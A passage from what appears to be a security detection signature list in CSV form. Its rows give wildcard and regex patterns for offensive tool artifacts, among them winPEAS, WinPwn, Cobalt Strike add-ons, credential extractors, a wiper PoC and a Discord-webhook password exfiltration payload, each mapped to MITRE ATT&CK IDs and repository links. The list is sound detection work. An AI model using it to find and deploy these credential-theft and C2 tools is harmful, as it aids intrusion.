"*winPEASps1*",".{0,1000}winPEASps1.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 
- T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASx64.exe*",".{0,1000}winPEASx64\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEASx64.exe*",".{0,1000}winPEASx64\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASx64_ofs.exe*",".{0,1000}winPEASx64_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASx86.exe*",".{0,1000}winPEASx86\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEASx86.exe*",".{0,1000}winPEASx86\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEASx86_ofs.exe*",".{0,1000}winPEASx86_ofs\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEASx86_ofs.exe*",".{0,1000}winPEASx86_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*Win-PS2EXE.exe*",".{0,1000}Win\-PS2EXE\.exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*WinPwn -*",".{0,1000}WinPwn\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - 
T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*WinPwn.exe*",".{0,1000}WinPwn\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*WinPwn.ps1*",".{0,1000}WinPwn\.ps1.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*WinPwnage*",".{0,1000}WinPwnage.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1203 - T1059 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","2541","377","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z" "*winpwnage.functions*",".{0,1000}winpwnage\.functions.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*winreconstreamline.bat*",".{0,1000}winreconstreamline\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*winregistry.py*",".{0,1000}winregistry\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*WinRM already running on port 5985. 
Unexploitable!*",".{0,1000}WinRM\salready\srunning\son\sport\s5985\.\sUnexploitable!.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*winrm_command_shell.rb*",".{0,1000}winrm_command_shell\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*winrm_script_exec.*",".{0,1000}winrm_script_exec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*winrm-detection.py*",".{0,1000}winrm\-detection\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*winrmdll *",".{0,1000}winrmdll\s.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","0","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*winrmdll.*",".{0,1000}winrmdll\..{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*WinSCPPasswdExtractor*",".{0,1000}WinSCPPasswdExtractor.{0,1000}","offensive_tool_keyword","WinSCPPasswdExtractor","Extract WinSCP Credentials from any Windows System or winscp config file","T1003.001 - T1083 - T1145","TA0003 - TA0007 - TA0008","N/A","N/A","Credential 
Access","https://github.com/NeffIsBack/WinSCPPasswdExtractor","1","1","N/A","N/A","1","11","1","2023-07-01T17:27:32Z","2022-12-20T11:55:55Z" "*WinShellcode.git*",".{0,1000}WinShellcode\.git.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WinShellcode-main*",".{0,1000}WinShellcode\-main.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Winsocky-main*",".{0,1000}Winsocky\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","95","16","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*WINspect.ps1*",".{0,1000}WINspect\.ps1.{0,1000}","offensive_tool_keyword","WINspect","WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ","T1018 - T1082 - T1057 - T1547.001 - T1053","TA0003 - TA0006 - TA0008 - TA0010","N/A","N/A","Information Gathering","https://github.com/A-mIn3/WINspect","1","1","N/A","N/A","6","571","116","2019-01-09T12:56:57Z","2017-08-10T15:10:10Z" 
"*win-x64-DynamicKernelWinExecCalc*",".{0,1000}win\-x64\-DynamicKernelWinExecCalc.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*Wiper POC tool that wipes a given directory*",".{0,1000}Wiper\sPOC\stool\sthat\swipes\sa\sgiven\sdirectory.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*WiperPoc.exe*",".{0,1000}WiperPoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*WiperPoc\WiperPoc*",".{0,1000}WiperPoc\\WiperPoc.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*wireghoul/htshells*",".{0,1000}wireghoul\/htshells.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*wireless/captures.py*",".{0,1000}wireless\/captures\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless/cracker.py*",".{0,1000}wireless\/cracker\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless/pmkid.py*",".{0,1000}wireless\/pmkid\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless/sniper.py*",".{0,1000}wireless\/sniper\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wireless_attack_tools.py*",".{0,1000}wireless_attack_tools\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*wirelesskeyview.exe*",".{0,1000}wirelesskeyview\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wirelesskeyview.zip*",".{0,1000}wirelesskeyview\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WirelessKeyView_x64.exe*",".{0,1000}WirelessKeyView_x64\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wirelesskeyview-no-command-line.zip*",".{0,1000}wirelesskeyview\-no\-command\-line\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wirelesskeyview-x64.zip*",".{0,1000}wirelesskeyview\-x64\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wiresocks-main*",".{0,1000}wiresocks\-main.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*wiresocks-redsocks*",".{0,1000}wiresocks\-redsocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" 
"*Witness.py*",".{0,1000}Witness\.py.{0,1000}","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/FortyNorthSecurity/EyeWitness","1","1","N/A","N/A","10","4706","819","2024-02-22T17:22:45Z","2014-02-26T16:23:25Z" "*WitnessMe*",".{0,1000}WitnessMe.{0,1000}","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","8","711","109","2024-04-02T08:19:14Z","2019-07-06T05:25:10Z" "*wkhtmltoimage.py*",".{0,1000}wkhtmltoimage\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*",".{0,1000}WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in 
Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*WKL-Sec/dcomhijack*",".{0,1000}WKL\-Sec\/dcomhijack.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","242","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*WKL-Sec/HiddenDesktop*",".{0,1000}WKL\-Sec\/HiddenDesktop.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*WKL-Sec/Winsocky*",".{0,1000}WKL\-Sec\/Winsocky.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","95","16","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*wkssvc_##*",".{0,1000}wkssvc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*WLAN-Windows-Passwords-Discord-Exfiltration*",".{0,1000}WLAN\-Windows\-Passwords\-Discord\-Exfiltration.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*WldpBypass.cs*",".{0,1000}WldpBypass\.cs.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & 